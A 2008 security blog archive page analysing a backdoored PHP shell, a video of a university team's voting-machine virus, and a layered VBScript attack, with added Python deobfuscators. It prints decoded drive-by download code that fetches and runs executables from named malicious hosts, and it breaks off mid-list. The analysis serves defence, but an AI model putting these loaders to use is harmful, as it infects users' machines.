Posts published in September 2008.

Backdoored PHP shells

PHP shells are tools that attackers often use to manage compromised web servers. It turns out that some of these attackers may be attacked through their own tools.

In fact, PhishTank report 505183 shows a nice example of a backdoor inserted in a PHP shell. The shell in question is a variant of the w4ck1ng shell. Each page generated by the shell contains the following script tag:

<script>
var dc=document.write;
var sc=String.fromCharCode;
var exe="http://reda-vision.com/config.exe";
var file="run.exe";
dc(sc(60,115,99,114,105,112,116,62,118,97,114,32,97,105,108,105,97,110,
44,122,104,97,110,44,99,109,100,115,115,59,97,105,108,105,97,110,61,34) + 
exe + sc(34,59,122,104,97,110,61,34) + file + sc(34,59,99,109,100,115,
115,61,34,99,109,100,46,101,120,101,34,59,116,114,121,123,118,97,114,32,
...
97,116,99,104,40,101,41,123,125,59,60,47,115,99,114,105,112,116,62));
</script>
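The fragment above can be unwrapped without ever executing it. The following Python decoder is an added analyst's example, not code from the original post: it resolves the two aliases (dc for document.write, sc for String.fromCharCode), substitutes the plain string variables, converts each number list back to text, and then extracts URLs and COM class ids from the decoded result so they can be fed to blocklists or detection rules. The sample input is the fragment above with the elided middle left out (so the decoded text shows a visible seam at "try{var atch"); function names are my own.

```python
import re

# Constructed sample: the obfuscated fragment quoted above, with the part the
# post elides ("...") omitted, so the decoded output has a seam at try{var atch.
SAMPLE_JS = '''
var dc=document.write;
var sc=String.fromCharCode;
var exe="http://reda-vision.com/config.exe";
var file="run.exe";
dc(sc(60,115,99,114,105,112,116,62,118,97,114,32,97,105,108,105,97,110,
44,122,104,97,110,44,99,109,100,115,115,59,97,105,108,105,97,110,61,34) +
exe + sc(34,59,122,104,97,110,61,34) + file + sc(34,59,99,109,100,115,
115,61,34,99,109,100,46,101,120,101,34,59,116,114,121,123,118,97,114,32) +
sc(97,116,99,104,40,101,41,123,125,59,60,47,115,99,114,105,112,116,62));
'''


def string_vars(js):
    """Collect plain assignments of the form var name="..."; (no escape handling)."""
    return dict(re.findall(r'var\s+(\w+)\s*=\s*"([^"]*)"', js))


def fromcharcode_alias(js):
    """Return the local name bound to String.fromCharCode, or the full name."""
    m = re.search(r'var\s+(\w+)\s*=\s*String\.fromCharCode\s*;', js)
    return m.group(1) if m else "String.fromCharCode"


def write_call_arg(js):
    """Return the argument text of the document.write(...) call, via its alias if any."""
    m = re.search(r'var\s+(\w+)\s*=\s*document\.write\s*;', js)
    name = re.escape(m.group(1)) if m else r'document\.write'
    m = re.search(name + r'\((.*)\);', js, re.S)
    if not m:
        raise ValueError("no document.write call found")
    return m.group(1)


def decode_expr(expr, alias, vars_):
    """Statically evaluate a '+'-joined expression of alias(n,n,...) calls and string vars."""
    out = []
    for part in expr.split("+"):
        part = part.strip()
        m = re.fullmatch(re.escape(alias) + r'\(([\d,\s]*)\)', part, re.S)
        if m:
            out.append("".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()))
        elif part in vars_:
            out.append(vars_[part])
        else:
            raise ValueError("cannot decode statically: %r" % part[:40])
    return "".join(out)


def decode_document_write(js):
    """Decode the text the script would pass to document.write, without running it."""
    return decode_expr(write_call_arg(js), fromcharcode_alias(js), string_vars(js))


URL_RE = re.compile(r'https?://[^\s"\'<>]+')
CLSID_RE = re.compile(r'clsid:([0-9A-Fa-f-]{36})', re.I)


def extract_indicators(text):
    """Pull URLs and COM class ids out of decoded script text for blocking/detection."""
    return {"urls": sorted(set(URL_RE.findall(text))),
            "clsids": sorted(set(c.upper() for c in CLSID_RE.findall(text)))}


if __name__ == "__main__":
    decoded = decode_document_write(SAMPLE_JS)
    print(decoded)
    print(extract_indicators(decoded))
```

Because the decoder only handles number lists, string variables and `+`, it raises on anything it cannot resolve statically instead of guessing, which is the behaviour you want before deciding whether a sample needs a sandbox.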

After decoding the JavaScript code, a classic drive-by download attack is revealed:

var ailian,zhan,cmdss;
ailian="http://reda-vision.com/config.exe";
zhan="run.exe";
cmdss="cmd.exe";
try{
  // RDS.DataSpace control (the MDAC/MS06-014 vector), used as an object factory
  var ado=(document.createElement("object"));
  var d=1;  // d, e, f, g, h and n are padding with no effect
  ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
  var e=1;
  var xml=ado.CreateObject("Microsoft.XMLHTTP","");
  var f=1;
  // "Adodb.Stream" is assembled from pieces to defeat simple string matching
  var ln="Ado";
  var lzn="db.St";
  var an="ream";
  var g=1;
  var as=ado.createobject(ln+lzn+an,"");
  var h=1;
  xml.Open("GET",ailian,0);   // fetch the executable
  xml.Send();
  as.type=1;                  // binary stream
  var n=1;
  as.open();
  as.write(xml.responseBody);
  as.savetofile(zhan,2);      // write it to disk as run.exe
  as.close();
  var shell=ado.createobject("Shell.Application","");
  shell.ShellExecute(zhan,"","","open",0);                        // run it
  shell.ShellExecute(cmdss," /c del /S /Q /F "+zhan,"","open",0); // then delete the file
} catch(e){};

The config.exe file is detected by one-third of the antivirus tools used by VirusTotal and, according to the Anubis report, behaves like a Bifrost variant.


Attacking electronic voting systems: the video

Last summer, I was a member of the UCSB Computer Security Group that tested the security of the Sequoia electronic voting system. Our work was part of the Top-To-Bottom Review of electronic voting machines in California, ordered by Secretary of State D. Bowen.

Our task was to detect vulnerabilities in the Sequoia voting system and implement exploits that would "cause incorrect recording, tabulation, tallying or reporting of votes" or that would "alter critical election data such as election definition or system audit data".

We designed and implemented a number of these attacks. In particular, we proved that it is possible to combine several attacks to inject into the system virus-like malicious software that automatically spreads to as many voting machines as possible. We have (at last!) been able to release a video we prepared that shows what can be achieved by such a virus.

The video lasts about 16 minutes: it gives a nice overview of the voting system and shows the complete life-cycle of the virus (click on the video to play it). If you are in a hurry, I recommend starting at around minute 12:26 to see that votes can be changed on a VVPAT-enabled DRE machine and that seals can be bypassed without being detected.

You can download the video from here. More information is available on the Computer Security Group's voting page.

Update: the group's site has been slashdotted... The video can be found on youtube (part I, part II)


VBScript attack

What is VBScript used for? For web attacks, of course!

For example, flyzhu.9966.org, a domain used in the recent SQL injection campaigns (and, surprisingly, still active), offers some nice examples of malicious VBScript code. To run these samples, you can use Cscript under Windows. To dump interesting values to the console, just use the WScript.Echo function.

On flyzhu.9966.org, the first step of the attack is performed by the following script:

<script language="VBScript">
Cn911="83,61,34,51,67,53,...,84,69,32,68"
Function Rechange(Q)
    S=Split(Q,",")
    Cn922=""
    For i = 0 To UBound(S)
        Cn922=Cn922&Chr(eval(S(i)))
    Next
    Rechange=Cn922
End Function
EXECUTE(Rechange(Cn911))
</script>

The actual content, in the Cn911 variable, is obfuscated by substituting each character with its ASCII encoding. Once decoded, one obtains another obfuscated script:

S="3C5363726970...6970743E"
D="Document.Write """""
C="&CHR(&H"
N=")"
DO WHILE LEN(S)>1
    IF ISNUMERIC(LEFT(S,1)) THEN
        ' chunk starting with a digit: two hex digits
        D=D&C&LEFT(S,2)&N
        S=MID(S,3)
    ELSE
        ' chunk starting with a letter: four hex digits
        D=D&C&LEFT(S,4)&N
        S=MID(S,5)
    END IF
LOOP
EXECUTE D

Character-code obfuscation is used again, this time in hexadecimal. The loop reads a chunk from S (two characters when the chunk starts with a digit, four when it starts with a letter), interprets it as a hex number, and appends the corresponding CHR() call to D, which is then EXECUTEd. The result is yet another obfuscated script:

Document.Write &CHR(&H3C)&CHR(&H53)...&CHR(&H70)&CHR(&H74)&CHR(&H3E)

The third round uses character-code encoding once more. Once deobfuscated, one obtains:

<Script Language=VBScript>
On Error Resume Next
Set Ob = Document.CreateElement("object")
Ob.SetAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set Pop = Ob.Createobject("Adodb.Stream","")
If Not Err.Number = 0 then
    Err.clear
    Document.write ("<embed src=flash.swf></embed>")
    Document.write ("<iFrame sRc=real.htm width=0 height=0></ifrAmE>")
    Document.write ("<iFrame sRc=new.htm width=0 height=0></ifrAmE>")
Else
    Document.write ("<iFrame sRc=help.htm width=0 height=0></ifrAmE>")
End If
</Script>
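The three stages above can be unwrapped offline without cscript. The following Python code is an added example, not code from the original post: decode_decimal_stage replays the Rechange() function, build_stage2_writer emulates the DO WHILE loop exactly (including the 2-versus-4 hex-digit rule and the fact that LEN(S)>1 drops a dangling single character), decode_chr_chain collapses the &CHR(&Hxx) chain of the third stage, and deobfuscate chains them. The sample Cn911 starts with the six codes visible in the post (83,61,34,51,67,53, which decode to S="3C5) followed by a short constructed hex payload standing in for the elided remainder; function names are my own.

```python
import re


def decode_decimal_stage(csv_codes):
    """Stage 1: comma-separated decimal character codes, as Rechange() does with Chr(eval(...))."""
    return "".join(chr(int(code)) for code in csv_codes.split(",") if code.strip())


def build_stage2_writer(hex_payload):
    """Stage 2: emulate the DO WHILE loop over S.

    A chunk whose first character is a digit is read as a 2-digit hex code; a chunk
    starting with a letter (A-F) is read as a 4-digit code. The loop condition
    LEN(S)>1 means a dangling single character is silently dropped, as in the original.
    """
    s = hex_payload
    # The VBScript literal "Document.Write """"" unescapes to: Document.Write ""
    d = 'Document.Write ""'
    while len(s) > 1:
        width = 2 if s[0].isdigit() else 4
        d += "&CHR(&H" + s[:width] + ")"
        s = s[width:]
    return d


CHR_RE = re.compile(r'CHR\(&H([0-9A-Fa-f]+)\)', re.I)


def decode_chr_chain(vbs_expr):
    """Stage 3: collapse a &CHR(&Hxx)&CHR(&Hxx)... chain into the text it writes."""
    return "".join(chr(int(h, 16)) for h in CHR_RE.findall(vbs_expr))


def deobfuscate(stage1_csv):
    """Run all three stages: decimal codes -> VBScript carrying S="<hex>" ->
    Document.Write chain -> final markup."""
    stage1 = decode_decimal_stage(stage1_csv)
    m = re.search(r'S\s*=\s*"([0-9A-Fa-f]+)"', stage1)
    if not m:
        raise ValueError('stage 1 output does not carry an S="<hex>" payload')
    return decode_chr_chain(build_stage2_writer(m.group(1)))


# Constructed sample: the first six codes are the ones visible in Cn911 above
# (decoding to S="3C5); the rest is a short hex payload standing in for the
# elided remainder, so the whole thing unwraps to "<Script>".
SAMPLE_CN911 = "83,61,34,51,67,53,51,54,51,55,50,54,57,55,48,55,52,51,69,34"


if __name__ == "__main__":
    print(decode_decimal_stage(SAMPLE_CN911))   # S="3C5363726970743E"
    print(build_stage2_writer("3C53"))          # Document.Write ""&CHR(&H3C)&CHR(&H53)
    print(deobfuscate(SAMPLE_CN911))            # <Script>
```

Emulating the loop rather than simply hex-decoding S matters: a payload that mixes letter-led 4-digit chunks (for example FF01) with digit-led 2-digit ones decodes differently under the two readings, and a decoder that gets this wrong will produce garbage for exactly the samples where the author relied on that trick.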

This script checks whether the browser is vulnerable to the MDAC remote code execution exploit (MS06-014) and, depending on the result, loads different files. In all cases, these files attempt to exploit various vulnerabilities to download and execute a binary from http://www.tlcn.net/cert/fuckkr.exe.

In particular, the loaded files are: